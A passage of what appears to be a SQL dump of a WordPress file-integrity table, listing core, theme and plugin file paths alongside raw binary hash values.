','wp-content/plugins/contact-form-7/includes/js/jquery-ui/themes/smoothness/jquery.ui.theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',',#�d�]�2����Sx','�8<���d���&��>��)�殡��','',0,'?'),('��6����~e�{�\".w','wp-includes/widgets/class-wp-widget-recent-comments.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','~���f%�(��xfn3','��0ſ���Y�~�YǦ�����m','',0,'?'),('��m5�m�r��','wp-content/themes/vega/assets/img/ico_arrow_ud_white.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�A\\���3rg:�S^8o','�k 4S��^_�j�niC&����_��=2�','',0,'?'),('�)h�ͣ�,PR�\06m','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_labels.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�g��ot9��@Ӵ','��C�.u}T�����/o3;�Y��b�!f','',0,'?'),('�*O-�Lτ���\r[�u','wp-admin/css/about-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y|[,*7?�;��#Op','����-���!�aJ���VRju�G���%�','',0,'?'),('�1?�N��.��*QQ40','wp-content/plugins/spam-captcha/core/lang/SL_framework-ja_JP.mo',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','x��~V{땳L�=�ʓ ','@�cj�<~�$�������I�\0(�u���L','',0,'?'),('�??n�����_2g��j','wp-includes/js/wp-util.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M�J���2$J��+���','�u������g⽶����`߆�]�SR,�а�','',0,'?'),('�Yg�$z�H�.Y��','wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','gj��z7=���','����g��%��R�C�R}<�0�]�uɬK','',0,'?'),('�y~��/ݺ�KJ��ߡ','wp-content/plugins/wordpress-seo/vendor/yoast/api-libs/google/auth/Google_Signer.php',0,'�xvmZ��j��M�1l','�xvmZ��j��M�1l','�}r�_�\0�>�.ա��E��F��|�P�2^~','',0,'?'),('�|����I���I��!,','wp-content/themes/supernews/acmethemes/customizer/header-options/search-option.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-��E���=�\r���','M�Z�qOh���m՛&��Vf@~`vW}�[�G','',0,'?'),('���9�E%(�O(�� ','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/text-block/options.php',0,'$m\0�����8��','$m\0�����8��','�5�<�p?�<Dz�_C�^e^���=nV��rM��','',0,'?'),('������Xo��~�_k','wp-content/plugins/contact-form-7/includes/mail.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�{�zn�8�)>��','������r��˘g���b�����I��o�','',0,'?'),('���6o8���NoL;','wp-content/plugins/contact-form-7/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��5����ʏ�ٸ�l','߱è��$X���\"F�8��@x�9����','',0,'?'),('��xZ����RzV��','wp-content/plugins/unyson/framework/extensions/builder/includes/option-types/builder/includes/templates/init.php',0,'���^cK����lj��1^','���^cK����lj��1^','e�PT�~�B�+#����i%-�Y���OCl�','',0,'?'),('��`$Ϯ���O�\0i','wp-content/themes/twentytwentyone/assets/sass/05-blocks/quote/_style.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n�В��o�a�\"��','l	@>	�8[w�t����?X扊�>��V}�€','',0,'?'),('�Ğiܭ>���-����','wp-content/themes/clean-magazine/js/jquery.cycle/jquery.cycle2.js.map',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����:`{Y�S�C�','����q�g:�/�T�?7ҙ����q���','',0,'?'),('��E�2�wJN���i��','wp-content/themes/illdy/layout/images/front-page/front-page-testimonial-1.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`ΰ�X��|Gs�|','�Q�1�	�#�r�??\'�,%\\J<�L)�J@�\n','',0,'?'),('��\'�ۻ�q�P�&k','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_jumbotron.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','-���U)�Mo��J','����{q6ol�eϞ�IB^��uo�&�8��[','',0,'?'),('��\n��R�b��x���g','wp-includes/css/dist/block-library/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Ȫ`�J�r�/��!w�*t','�҂��\0��&����D\\�c�^x��!/]�>\r1','',0,'?'),('��0-�V��7u=���','wp-content/themes/hueman/option-tree/includes/ot-functions-compat.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i�ծ���z^��%','lv�[r�?\"�+��_S�Ã�o��# pR)','',0,'?'),('���K���\'�\Zxrx��','wp-content/themes/twentytwentyone/assets/sass/06-components/footer.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Y�	���,�W��\Z�^','Zv�MYWH��k��I=��\Z�Qj�E�ǟ�','',0,'?'),('��Y�\0)\r/j�)�Ar','wp-includes/customize/class-wp-customize-filter-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M��`f��\0�iu�','�\0<\n�j:��Y�F���d�w��	���','',0,'?'),('�P�h`|/���:W�\0','wp-includes/blocks/columns/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U�s�uo�F=��\r�P','�a�H�O3Ų���z\r��a\0�l,M�����r','',0,'?'),('�4�;���TrlA�j�','wp-content/plugins/all-in-one-wp-migration/lib/view/import/button-url.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���\n�L��`+\n{cs','�{m5u�F��V:��h��҉v�/��Y���H','',0,'?'),('�$n1��U\\�x(�','wp-includes/blocks/missing/block.json',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$�YԺ\"9N�Rt�f','k�E�E��+�hR�aw����߸��0{`����','',0,'?'),('�$_���X��la�','wp-includes/js/jquery/ui/sortable.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�kX���E�EL�&�','F\0|\'��Lk8qp� �(����� v�}/5N![','',0,'?'),('�?�cKl}��g5ᴐ��','wp-content/plugins/contact-form-7/includes/submission.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','c{�<�IgI���]','�{n>��+>��K�6�s�����;n�','',0,'?'),('�G��o���a%��g�y�','wp-content/themes/panoramic/library/template-parts/content-search.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r�*証��w\\Zݔ�','$FF����\Z��O�n�.|1G��l�5]�','',0,'?'),('�O���+SI=�','wp-content/plugins/unyson/framework/extensions/backups/helpers.php',0,'ׅ�_]��O�X�)','ׅ�_]��O�X�)','57Z4��[�iDD�5�(���8ՐT��-�u���0k','',0,'?'),('�Qv<��6�o�@иIا','wp-content/themes/morfeu/home.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�︖�Q���2]p��','�э2��{���7x��(��X�<�y��z','',0,'?'),('�R;lzO�8m<3�Nie','wp-admin/user/freedoms.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`���U�� }��\n�','�οzB�+q���5Vl�K�l��k���Z/��|','',0,'?'),('�V�[S@?�ΥS}P���','wp-content/plugins/spam-captcha/core/lang/SL_framework-th_TH.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\\�RQ�5�	<�	��9�_','��؈g�;�7���2���\"�!Y:��8�T���','',0,'?'),('�[\0��qQ{�U�ԋ��','wp-content/themes/travelify/library/font/Genericons.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','s/�n]�d���z�?','�*���SW����.��~5t�=���V�p̦�','',0,'?'),('�_;n�_*�/���Y(`','wp-content/themes/hueman/assets/front/js/lib/vivus.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�b@$$>J�v���`�H','�ڛ�����@ǵ?�szA�#�̰�.�','',0,'?'),('�afh=F���T�:��6�','wp-admin/includes/class-ftp-sockets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','Q�\"P����e<��3i','.\Z�D��-����ày!�����̕l��','',0,'?'),('�����;~ӷR�>��','wp-includes/class.wp-scripts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`����~�#\"ξ����','�G+q=p\":C����\rG�>/d��*!˯�|��','',0,'?'),('���nvp�e������}�','wp-admin/js/customize-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','`���w��bbw�T���','֠h2d�\'�!{��{D����\0-�#��`�T','',0,'?'),('��� �H\"ū�͜�}��','wp-content/plugins/spam-captcha/core/include/tokenize/jquery.tokenize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0�n}�_�_h��+��','�V~`d^�Ĭc�]B���L��%j�IC','',0,'?'),('��~f���J��,��','wp-content/themes/sg-window/img/icons/small/friendfeed.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��g�h%8���U��L��','�ɢ�[��P1Ik2����Q���#)�	�ډcP','',0,'?'),('��ucZ��o��s�','wp-content/plugins/all-in-one-wp-security-and-firewall/admin/wp-security-list-comment-spammer-ip.php',0,'D�H?�Xl�Ώ�u�','D�H?�Xl�Ώ�u�',':�\\�I�̂V�W�\nkb�3�U��M#_�d\ZP�','',0,'?'),('�Ƴ����9\n�N\'��l','wp-content/plugins/unyson/framework/includes/option-types/date-picker/static/js/locales/bootstrap-datepicker.rs.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�4���Ln�)�O�','��UyI�	3K�����c�D�z��}��j�','',0,'?'),('���*��h^������','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/lib/php72compat_const.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n<Tfw��Y�_I���','e��\'#�\\�?����O-�U�L�]5�6��$','',0,'?'),('�� �\\���…�Tn��]','wp-includes/Requests/IDNAEncoder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�}��2����P�ر','�M?�~\"��u%�[�,�l����+?F-}�M)�','',0,'?'),('��5/>�[�R@�	_�','wp-content/themes/illdy/sections/front-page-bottom-header.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���Z��4���+���','\rUq\\��%O`T�z3�k,���ݗ|�0�\Z��;M','',0,'?'),('���B\\u}�L�,���','wp-includes/css/dist/block-directory/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�����%���iIp�:','�V~�����]C���� G�cݠ�<���','',0,'?'),('���n���84/���','wp-content/plugins/unyson/framework/includes/option-types/upload/static/css/modal.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','[�S��x�$�t��','��\n�7�T#����u���ȹ[����8,�l�','',0,'?'),('���:�[�f��KZ�?�','wp-content/themes/twentytwentyone/assets/sass/06-components/comments.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\n��kn���V�','�rn�~	|���HesILfjR�.`G����jk�','',0,'?'),('���(_�J�D~���','wp-content/themes/twentynineteen/inc/block-patterns.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�j%mx�t�h��','��m�ۄ�({�V�3�R�#/.pBց\')r@��','',0,'?'),('�\0�y�k����݁�','wp-content/themes/supernews/acmethemes/customizer/options/breadcrumb.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�xBLI�2�Zb�OH','3��+ST�P�M����Ʃ�/� 3�Ku�','',0,'?'),('���{A�7?�\0\Z.��','wp-content/themes/twentyseventeen/assets/images/header.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�0C��EK�>�5|‹Q','|�%�`�}3?M��±���K�X��WME�X','',0,'?'),('��\Z���3�H�{�Dz�','wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r� ���Ϭ�n+�n','^�q�N����Т��&yN�~�\'S//>}�p','',0,'?'),('�#:���Sk�U���{�','wp-content/plugins/wordfence/modules/login-security/classes/model/view.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','*�:�?��l]�����u','2P��탚��=w=��7Ar�\n�fQ��~,��B','',0,'?'),('�(�|n��sARF�+','wp-includes/js/crop/marqueeHoriz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̮����;���Lo\n','|���S�e��|.���/�Q�Y��W�}(','',0,'?'),('�[\'�/���;���','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/Core32/Poly1305/State.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��yP58��Ƣ����','��z3qS���T=�䞌HL<Y5A��#H','',0,'?'),('�j���e��b�=�','wp-content/themes/twentyseventeen/template-parts/footer/footer-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��{r�A���X�TeU','ʓ�70V�S�S%\n��=����~d��f�u9�','',0,'?'),('�u�dῈ@�����[','wp-content/themes/clean-magazine/js/skip-link-focus-fix.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ʝa���=q�x\0���m','�޲4��t�F���\Z)i��+i[����*x�','',0,'?'),('�� P0~��R Y~�i','wp-content/themes/nirvana/fonts/DroidSans-webfont.ttf',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��F�q� I��','4���#�����p�\0�g޻��&U��3�:','',0,'?'),('�����:[&b�[�hY��','wp-includes/images/smilies/icon_razz.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9[�w���D�AM�A�',';���P�1]f�UE��;`Qڮ�\ne�Z\0@4�aA�','',0,'?'),('��X:޴(2\0�Ѣn�','wp-content/plugins/unyson/framework/includes/option-types/multi-upload/views/images-only.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q�SNJ���k0�?�}�','Eo3�$�T��^����]�ᇼIɧ}','',0,'?'),('�����\nB�a{3	','wp-content/plugins/all-in-one-wp-security-and-firewall/lib/whois/whois.pt.php',0,'	�q(�㫋i�N���y�','	�q(�㫋i�N���y�','��h�U�6fB�a��NJ�[v�f�	��Խ��8','',0,'?'),('���x2�_.�~$�)','wp-includes/js/dist/core-data.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','m�N�n�G#ۀ��','���i�	��[�h�5���\ry�z�C�)E','',0,'?'),('��\r?�\rN����%ws','wp-content/themes/morfeu/assets/fonts/bootstrap/glyphicons-halflings-regular.woff2',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','D�4�mi�)z�d�:��','�s-N=ip��f�7{��άTO���@��x�<X','',0,'?'),('�Ὀ����5f?�hk','wp-includes/widgets/class-wp-widget-media-audio.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','O�P��/:���#�A','��P����!𴴨jz�F#�����d�ĚMP','',0,'?'),('��(zN��Ms�^ts','wp-content/themes/nirvana/admin/images/3cSr.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y%i\Z%ɐ\'�@�`\'�','�z�_k��e`��J��SڣA���of+w�','',0,'?'),('���y��=�`k�Ƀ�v','wp-content/plugins/unyson/framework/static/libs/selectize/selectize.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','_�[ؓ3�[w5��g;C','���,^T�[�+�V�U��h�x�&s�NT�','',0,'?'),('����8`9��?Bb�Б','wp-includes/js/jquery/ui/effect-puff.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�^��5�����t�','`}��`�J)�$;��+�6K�C1R�&]C�i��','',0,'?'),('����F)��cPO�R�?','wp-content/themes/sg-window/img/icons/blogger.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M4�m�W�G�#��','~ ���o�W��������c�L�[5�R)f>�','',0,'?'),('�\n��� ��/Y','wp-includes/js/dist/data-controls.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����g@�f.A) �','}.\'��an�,���V�岖$j��Ϫ\0�','',0,'?'),('�J���\Z��m=�','wp-content/themes/sg-window/inc/widget-items-category.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','nu3P�Έj\01�m�D�',' @�g�*�[4�o��!_�~����\ZH����R','',0,'?'),('�R�����z�~R%�','wp-content/themes/fluida/cryout/css/jquery-ui.theme.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��f�\n�<�W�O��','�UG����ΰ�R煥��fk����0���','',0,'?'),('�Q�-�(SE#T���','wp-content/themes/wen-business/assets/css/responsive.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','¤�s�n��w��','�Ӯ,��Q��x��̲�I�RG�|g�:�','',0,'?'),('�SF���b��+N�Ѕ t','wp-content/themes/vega/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$��h/�e��\\o>�','鮤���,��$��D���gGo^>���!x^5��','',0,'?'),('�Xө����kF�X','wp-content/themes/illdy/single.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','#>aJ���j�^ixsg','��y	B-V�#1�<r6=�ǩ.��^�M`','',0,'?'),('�a��.�j@��^��','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/psalm-above-3.xml',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','|<Qq��)@�M��J��','/�jo�z�y����@��z%9�&F%��[','',0,'?'),('�c�̎��$\n\'@�\r��','wp-admin/setup-config.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Tic��‹e�:�D1�','Ee����p�_�s��\r��٢T��z���k�','',0,'?'),('�m֙7�,�}��ov','wp-includes/css/dist/block-library/theme-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q?kqs��݉\0���.',']*dO�g9(��%��OV2Gy�9N��v0�d��','',0,'?'),('�q�P����G%���','wp-content/themes/hueman/option-tree/languages/option-tree.po',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','7Cr�����$X�','���+�5��>��`e�Ӓ0K��)��xF\\','',0,'?'),('���6x����O�����e','wp-content/themes/sg-window/inc/css/admin.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','G�\r�*#}��`���','�o�mBa��S�\n�{}$g-�	Gfh���','',0,'?'),('���V��t�S�-��','wp-content/plugins/wordfence/views/scanner/issue-file.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Z>?�iY+Q�K�C��','r������쐋����&5�Q8�C\"���K�','',0,'?'),('���H\03�ۡ�E�p�$$','wp-content/themes/twentytwenty/template-parts/navigation.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��,�)�\Z~w�������','�%���K.�P��V�vZ�ښ�[\0�ȗfE��6','',0,'?'),('���J1��M�F��<�','wp-admin/js/tags-box.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','6|�1\n&c�G%X(a','F�~�{�E )P���$�%MSb�����+O5','',0,'?'),('�����|=�g���Ӡ','wp-content/themes/skt-construction-lite/images/slides/slider3.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','+i��m�g��Mw��','�\"q>W\"� m\'�Ǐ�%�0�-�;=�q{�E�','',0,'?'),('�����Ƅ���NB׭','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/autoload-pedantic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�@8���s��A��','b�#�x��h�F4�_ �De���qeD��','',0,'?'),('�ę�)sm�[�j\n&�','wp-content/plugins/all-in-one-wp-migration/lib/view/export/button-onedrive.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�J�_�F9�R��T]','���b:V�I}:A|ج�C��C���&$��','',0,'?'),('��p���{�(yL�]T','wp-content/plugins/unyson/framework/includes/option-types/slider/static/css/styles.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��>���.������g�','(��I���T\Z��ˌ�ҔT{f��z���ؔ','',0,'?'),('���?ڟ�E���$PF','wp-includes/pomo/translations.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��C���*\Z�\'��',')��P��Š�ObxZ-dtWN��ǧ�~x�^Y��','',0,'?'),('��\n��R��t~ZX','wp-content/themes/nirvana/images/socials/Mail.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','R)t�/��\0B����uP','Cy�̉�\r�r��>yJ� ��׎��J;���','',0,'?'),('���6��b�g�>_�','wp-includes/images/wlw/wp-watermark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';��uMmܭD|�w���D','�S��nR�\'��X�^���kh����ɑ�i�7�','',0,'?'),('�����̨�4�w','wp-content/plugins/unyson/framework/static/libs/font-awesome/fonts/fontawesome-webfont.svg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��|]�@���R�4z','/���\"�D~��oԽ��5�~D[s_Qy.!z','',0,'?'),('�h�x�*(�&���kO�','wp-content/plugins/wordfence/views/blocking/country-block-map.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�u��yGF�,{��X�z','%Ԝ5��;�����x��^)���G(��o','',0,'?'),('�����\'K�z�f��','wp-includes/customize/class-wp-customize-header-image-setting.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','y�$+��q?��U��','�9@mr�ܵ��\"+B���V�K.�uB\"�����','',0,'?'),('�\r�f����h�8�!','wp-includes/Requests/Exception/HTTP/500.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����km�\n	H�M��','FO���V3\"���������!k�P�','',0,'?'),('�Hc���1�ް�=','wp-content/plugins/wordpress-seo/admin/views/tool-file-editor.php',0,'�l��{�q�S\Z�x_�','�l��{�q�S\Z�x_�','\\���@�Fpm(�����v2-_���w%��','',0,'?'),('���v9�b�$�L','wp-includes/random_compat/error_polyfill.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','X:,��t]7�=��Q��E','��,��t�\0_g�X%4.�tP�]�>�JT4','',0,'?'),('��M�c�ϖ���L�','wp-content/themes/mh-magazine-lite/includes/widgets/mh-posts-large.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�O�uՉ�L��p\\9','�ɦD/Y�\Zs��ъo��ײzb�̛�S&�','',0,'?'),('���C�s�ZoBx�F�','wp-content/themes/sg-window/img/empty.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i��u�,`d�G��','\\˫[��	x7��U˳���W4��_}���1��','',0,'?'),('�!Y;��I-���u','wp-content/themes/twentynineteen/classes/class-twentynineteen-walker-comment.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�rV��S�|�k���',' ��^��67�+�k�`�ۍ���]B���G��p','',0,'?'),('�#�?���Gc	¯l1e','wp-includes/class-wp-theme.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�窞,d�F�ecq�t�','�@s)��wb���R|c/0�O`t	an^�\\�<�','',0,'?'),('�)��>��f�R\'����','wp-content/themes/clean-magazine/js/source/jquery.cycle/jquery.cycle2.tile.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����O�T�;\r�0�','$���]�P����t����&B�߳w#��ӄ�a��','',0,'?'),('�3��RG�3����[���','wp-content/plugins/unyson/framework/extensions/shortcodes/shortcodes/section/static/js/background.init.js',0,'P� ���z8��MV~)�','P� ���z8��MV~)�','�#=�F�����_$;���Su��@C>�#�ś�}�','',0,'?'),('�<��tD�XϦF��','wp-content/themes/twentyseventeen/assets/js/html5.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','^鐐{1P\'�`���K','�R�y1N�hu�¿���I}��؞���)i','',0,'?'),('�@V��T��L\'�~�i�','wp-content/plugins/wordpress-seo/admin/class-yoast-form.php',0,'�Bx���O����*A','�Bx���O����*A','(^z�z�#X\r\"���W6���k �Xv%r','',0,'?'),('�H�����Pw��%8��','wp-includes/images/smilies/icon_sad.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Ix�o��TMz��D-','�b5�yh�9���}���o��W�I��n�n�','',0,'?'),('�K�{�*�)�����','wp-content/plugins/all-in-one-wp-security-and-firewall/js/wp-security-admin-script.js',0,'�j�@�c��<�W8DM','�j�@�c��<�W8DM','��wL�\rd�Ê��3��<\'\n�:&̉��$޲3$O','',0,'?'),('�Q49��Lz�J�','wp-content/plugins/wordfence/lib/wfUtils.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','()p��|˜���s���T','���R��j�-y}��EHh\r�F�D�����BA�','',0,'?'),('�V-�N��ZVnf!h�','wp-content/plugins/spam-captcha/core/js/progressbar_admin.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','OK��x4�ߙ�l\'N\0','jfpF$,1��@�ڧ5�(�Yl$^ɰ��','',0,'?'),('�XX*��!2�~�','wp-content/plugins/wordfence/crypto/vendor/paragonie/sodium_compat/src/File.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�eb:lx-�<��s99`','�,��{ m��Z��BV�TL�;*���<','',0,'?'),('�[�n�G{�\'��q:�','wp-includes/ms-deprecated.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9��O0�gW�w�A#','Q?��?�R���tPu�	Υ�����=��','',0,'?'),('�\\�h� R�X�<�C�','wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���߅�w@L��O�R','��EF�j���r�č;s��΀.f:��Ϥ�F','',0,'?'),('�lQ�j��HQ�B-6O','wp-content/themes/morfeu/assets/sass/bootstrap/bootstrap/_dropdowns.scss',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ?[�{uB��B�','>:Ly�\0�#����o��M�%Zp�ד��p','',0,'?'),('�pK�z�9\"[�C�b','wp-content/themes/fluida/cryout/tgmpa-class.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','i1����@�j�Nhd\'�','\"JR�����K����.x�DŽR����]�q�H','',0,'?'),('�����ʊn���Z','wp-content/plugins/wordpress-seo/inc/sitemaps/class-sitemap-image-parser.php',0,'�۝�U�s0f��~F','�۝�U�s0f��~F',':����͇u��J��->v]U�s��,��','',0,'?'),('���;c͡~݃A4-i�','wp-content/themes/mh-magazine-lite/includes/mh-widgets.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','</���&�VA�����','�[+la��;���\\�\r0o7�ͮ=�DG�\n��','',0,'?'),('��J�ח�_yzx�6O','wp-admin/network/privacy.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0��>�H\r��5:�6�','*]X8���%�KқR	���Q�f�;\ne�\r�6\\','',0,'?'),('��a��X1�鮲;�H','wp-content/themes/clean-magazine/inc/clean-magazine-core.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��Pw���6N5�m����','Y�\\,��\\Ь^3N;�l��06�t<2q��v9�B','',0,'?'),('���Ȁ�~_q�I��S�','wp-admin/js/password-strength-meter.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�$#X9�\'�T.6$�','ǔ��-�>w�5[S;�H�K����1qO(\0��','',0,'?'),('���\\�D �>�F,���','wp-admin/menu.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\Z���\n_Ͱ�\\ �','}�4�7�H�yZ!խ�����B���i�P���','',0,'?'),('��[V<�4Ghv��','wp-content/themes/skt-construction-lite/images/icon-in.jpg',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�1�I�y\"����P��','Uyr�Z�#�9�?��}��	��[�6��d�%�M�_�','',0,'?'),('��Uhxٛ6�:[Ѳ�Ԁ','wp-content/plugins/all-in-one-wp-migration/lib/model/class-ai1wm-updater.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ڀ1��(k�G�.�K�3','���Y���R��\"V7q�̀������}�','',0,'?'),('���lX��7�`�+,�','wp-content/plugins/spam-captcha/readme.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',';�\"�*Y�z�F ���','��&0J��7t5̻M\nV�=OoT{FXi�<�FF��','',0,'?'),('���c^���fy]��P��','wp-content/plugins/all-in-one-wp-migration/lib/view/main/storage-index-html-notice.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' ��N��դ���&We�',',��1\\ʯ�,1Iㆅ�~\\Gz7��0����','',0,'?'),('��	